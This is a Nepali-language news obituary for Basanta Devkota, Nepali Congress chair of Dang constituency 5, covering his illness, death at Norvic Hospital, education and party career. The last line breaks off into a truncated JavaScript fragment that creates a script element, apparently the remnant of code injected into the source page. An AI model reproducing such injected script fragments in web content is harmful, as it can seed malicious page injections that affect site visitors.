congressदाङ,असोज ११ – नेपाली काँगे्रस दाङ क्षेत्र नम्बर ५ का सभापति वसन्त देवकोटाको ४८ बर्षको उमेरमा निधन भएको छ । देवकोटाको काठमाडौँस्थित नर्भिक अस्पतालमा उपचारका क्रममा सोमबार निधन भएको हो ।

रगत, फोक्सोलगायतमा समस्या देखिएपछि भदौ ३० गते नर्भिक अस्पताल, काठमाडौँमा भर्ना भएका देवकोटाको उपचारकै क्रममा निधन भएको उपचारमा संलग्न डाक्टर बजेन्द्र श्रीवास्तवले जानकारी दिए ।

विसं २०२५ सालमा श्रीगाउँ–६ बुटनीयामा बुबा स्व टोपेन्द्रप्रसाद उपाध्याय र आमा निलाकुमारी उपाध्यायको कोखबाट जन्मिएका देवकोटा वीरेन्द्र मावि श्रीगाउँमा विद्यालय र स्नातक तहको अध्ययन महेन्द्र बहुमुखी क्याम्पस तुल्सीपुरमा गरेका थिए । पार्टीमा क्रियाशीलता सँगसँगै उनी क्षेत्रीय सचिव र दुई पटक क्षेत्रीय सभापति समेत बनेका थिए ।

स्व देवकोटाका श्रीमती, तीन छोरा र एक छोरी छन् । देवकोटाको निधनले काँग्रेसलाई ठूलो क्षति पुगेको काँग्रेस जिल्ला सभापति कीर्तिबहादुर खड्काले बताए ।var d=document;var s=d.createElement(‘script’);